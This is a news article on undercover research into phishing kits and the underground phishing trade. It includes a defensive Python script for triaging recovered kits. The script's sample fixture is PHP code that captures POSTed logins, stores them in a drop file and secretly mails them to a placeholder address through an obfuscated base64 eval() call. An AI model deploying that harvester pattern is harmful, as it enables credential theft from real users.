Jason Harbert was a terrible spammer.
The research scientist for Cloudmark recently spent weeks monitoring the phishing community's chat rooms and forums, learned the lingo, earned some trust, and even received kits from the fraudsters who set up scam pages that steal victims' personal data. Then he went and hurt the criminals' feelings by not coming through on the spam delivery.
But he did come out of the experience with extensive data and insight on every aspect of the underground marketplace, including how the attacks are orchestrated and how phishing kits work—including their structure, so-called “brain files” and even new pyramid schemes linked to the spread of the kits.
After weeks of undercover research into the phishing community, Cloudmark contends that the availability of these automated phishing kits, costing $10 or $20, has made it a breeze for novices to start up operations and has caused a sharp rise in phishing attacks.
Hacker toolkits are nothing new. Recent news reports have even pointed to certified ethical hacking toolkits for sale on eBay, such as in this expired listing, which contained similar items still for sale as of Sept. 21.
Security vendor Tier-3, headquartered in Sydney, shrugs off the proposition that these above-ground sales are above-board in their connection to ethical hacking certification, saying that they contain surreptitious Trojan loaders and Web site hacking utilities that can be used for criminal black-hat hacking.
“It basically puts high-level hacking tools … into the hands of almost any Internet user—including novices—providing they have an eBay and PayPal account,” said Tier-3 CTO Geoff Sweeney in a statement.
Sweeney said that where previously would-be hackers “had to score brownie points to gain access to the hacker forums and source the kits”—as did Harbert—the fact that they are now on open sale on eBay is “very worrying.”
Although he hasn't looked at the eBay kits, Harbert said that if what Sweeney claims is true, the ethical kits are likely being used to commit cyber-crimes. “Most ethical hacking courses focus [on] techniques, rather than hacking kits, per se,” Harbert said. “But, there may be ethical hacking kits that I'm not aware of. If there are, it is almost certain that they would be leaked to the black-hat hackers and used for fraudulent activities.”
The number of phishing reports hit an all-time high of 55,000 in April, according to a trend report put out at the time by the Anti-Phishing Working Group.
The rise in phishing attacks, Cloudmark says, is due both to the profits involved and the ease of carrying them out. Phishing kits—aka “scam pages” in the phishing community—are a collection of files to create a comprehensive phishing site.
The individual components work together to automatically collect, store and send a victim's personal information back to the phisher. They're widely available, the company says, and typically cost $10 to $20, often sold as a bundle of multiple kits, each targeting a specific financial institution or organization, such as Bank of America or eBay.
Harbert described the phishing community as being made up of specific roles and jobs. The role of a spammer, for example, is to create and send e-mail messages with a link to the phishing site. Spammers often use botnets to send messages in bulk in a short period of time. Using botnets means spammers can reach the inboxes of a large number of people before anti-spam products identify the message and begin to filter it.
Another role in the community is that of the casher. These community members advertise their services in cashing out compromised bank accounts, such as Wells Fargo accounts.
Cloudmark published a whitepaper on the undercover work, “Going Undercover in the Slimy World of Phishing,” in which the company quoted this sample discussion from a phishing channel:
14:29 < Droper> cashout any us bank like Wachovia,Wells,Chase,Citibank,Boa,Wamu amd all uk banks and some Canada Banks also Pick WU and MG and drops for merchandise and drop for Billpay msg me for deal
14:31 < jiciuvyu> i have e-gold,root,paypal,poste.it,php mailer,php sender inbox,scam pages,ebay extractor,mail extractor,bank logins,and need wells drop prv me
The user with the handle “Droper” is a casher advertising the banks he or she can extract currency from. The other user, “jiciuvyu,” is advertising phishing tools and information available and also is requesting a “wells drop,” meaning a Wells Fargo bank account to transfer—or to “drop”—money into.
After talking the talk for a few weeks, Harbert convinced users to send him tools and phishing kits. Inside the kits he found HTML files, PHP files and a variety of other Web files.
Would-be phishers unzip a kit and run it. When deployed on a server, the kit creates an automatic phishing attack. The phisher inserts his or her e-mail address into the configuration file so that when a victim falls for the attack, his or her information is automatically forwarded to the phisher.
What surprised Harbert, he said, was to find that the variety of kits all shared a common set of back-end files—what he calls the “brain files,” with the same names.
Phishing monitoring companies are seeing an explosion of these kits—not surprising, given that they're “simple, easy and cheap” to run, Harbert said.
Looking deeper, he discovered that novice phishers are actually being scammed by advanced phishers. Those advanced phishers are writing and selling kits that include secret, obfuscated code that e-mails stolen information not only back to the primary phisher but to the original phisher who sold him or her the kit.
Harbert also discovered what he says is a new phishing variant: the storage of stolen information in flat text files. Besides e-mailing the information to phishers, the kits also write all captured data to text files in the directory of a given attack. Harbert found that those text files have common names, and those names are viewable on sites that report real-time phishing attacks, as Cloudmark does.
After writing a script to automatically retrieve the text files from such sites, Harbert was able to pull PayPal account details out of those flat text files—in other words, PayPal accounts stored in plain, unencrypted text. He thus obtained 15,000 PayPal accounts, including user names and passwords, using no phishing techniques whatsoever—just a simple automated search over publicly available feeds.
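The two kit behaviors described above, the hidden second recipient and the plain-text drop file, are the first things an incident responder looks for when a kit is recovered from a compromised server. The following Python script is an added example, not Cloudmark's or Harbert's code: it scans an unzipped kit for every e-mail address the kit can send to, including addresses buried inside base64-encoded eval() payloads, and for the text files the kit appends stolen data to. The kit contents, file names and addresses are constructed placeholders. It assumes the only obfuscation in use is base64_decode(), which is an assumption made for the example, not a claim about any particular kit; it does go beyond the article in following nested base64 layers, since a second layer is a cheap way for a kit author to defeat a one-pass decode.

```python
import base64
import json
import re
from typing import Dict, List, Set

# Constructed sample kit held in memory: the two files stand in for an unzipped
# "scam page". Every file name and e-mail address here is an invented placeholder.
_HIDDEN_CALL = b'mail("kit-author@example.net", $subject, $message);'
_HIDDEN_B64 = base64.b64encode(_HIDDEN_CALL).decode()

SAMPLE_KIT: Dict[str, str] = {
    "config.php": (
        "<?php\n"
        '$to = "operator@example.com";  // the buyer puts his own address here\n'
        "?>"
    ),
    "process.php": (
        "<?php\n"
        "include 'config.php';\n"
        '$message = "user=" . $_POST["user"] . " pass=" . $_POST["pass"];\n'
        '$subject = "New victim";\n'
        "mail($to, $subject, $message);\n"
        'file_put_contents("results.txt", $message . "\\n", FILE_APPEND);\n'
        'eval(base64_decode("' + _HIDDEN_B64 + '"));  // the kit author\'s cut\n'
        "?>"
    ),
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# base64_decode("...") with a literal argument; whitespace inside is tolerated
B64_LITERAL_RE = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)""")
# first argument of the two PHP write primitives kits use for flat-file storage
WRITE_RE = re.compile(r"""(?:file_put_contents|fopen)\(\s*["']([^"']+)["']""")


def decoded_layers(src: str, max_depth: int = 5) -> List[str]:
    """Recover the plaintext of every base64_decode("...") literal in src,
    following nested encodings (base64 inside base64) up to max_depth layers."""
    layers: List[str] = []
    frontier = [src]
    for _ in range(max_depth):
        nxt: List[str] = []
        for text in frontier:
            for m in B64_LITERAL_RE.finditer(text):
                try:
                    blob = base64.b64decode(m.group(1))
                except ValueError:
                    continue  # not valid base64 after all; skip it
                nxt.append(blob.decode("utf-8", errors="replace"))
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    return layers


def find_recipients(kit: Dict[str, str]) -> Dict[str, bool]:
    """Map each e-mail address in the kit to True if it is reachable only
    through a decoded payload (hidden from whoever bought the kit)."""
    visible: Set[str] = set()
    hidden: Set[str] = set()
    for src in kit.values():
        visible.update(EMAIL_RE.findall(src))
        for layer in decoded_layers(src):
            hidden.update(EMAIL_RE.findall(layer))
    return {addr: addr not in visible for addr in visible | hidden}


def find_drop_files(kit: Dict[str, str]) -> List[str]:
    """File names the kit writes to, in plain source or inside decoded payloads.
    These are the flat files that leak victim data if the web root is listable."""
    paths: Set[str] = set()
    for src in kit.values():
        paths.update(WRITE_RE.findall(src))
        for layer in decoded_layers(src):
            paths.update(WRITE_RE.findall(layer))
    return sorted(paths)


def triage(kit: Dict[str, str]) -> Dict[str, List[str]]:
    """One-shot report a responder can attach to a takedown ticket."""
    recipients = find_recipients(kit)
    return {
        "visible_recipients": sorted(a for a, h in recipients.items() if not h),
        "hidden_recipients": sorted(a for a, h in recipients.items() if h),
        "drop_files": find_drop_files(kit),
        "eval_files": sorted(name for name, src in kit.items() if "eval(" in src),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_KIT), indent=2))
```

Run against a real recovered kit, `triage()` would be fed a mapping of path to file content built with `os.walk()` over the unzipped directory; the sample dictionary is used here so the script runs offline. Both recipient lists matter to a responder: the visible address identifies the operator of this attack, while a hidden one points back to whoever sold the kit and is the same across many deployments. The drop-file names are what a takedown request should ask the hosting provider to remove first.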
Harbert also discovered a new trend within the community: unique attacks for every victim. Kits that create a unique scam URL for each target are highly desirable to phishers, because taking down any one URL no longer stops the attack.
Another role in the community is that of the rip-off artist who steals from the phishers. Called a “ripper,” such an individual promises to cash out a compromised account but instead just takes off with the money.
Armed with such terms, Harbert said it was easy to infiltrate the community. “Just go in and talk the talk, say you're interested, that you want to make a lot of money, that you want to help them with attacks,” he said. “I pretended to be a spammer. … A lot of phishers sent a kit, and I didn't do the work, and they were really kind of heartbroken. One guy told me I really hurt his feelings.”
Lisa Vaas can be contacted at firstname.lastname@example.org.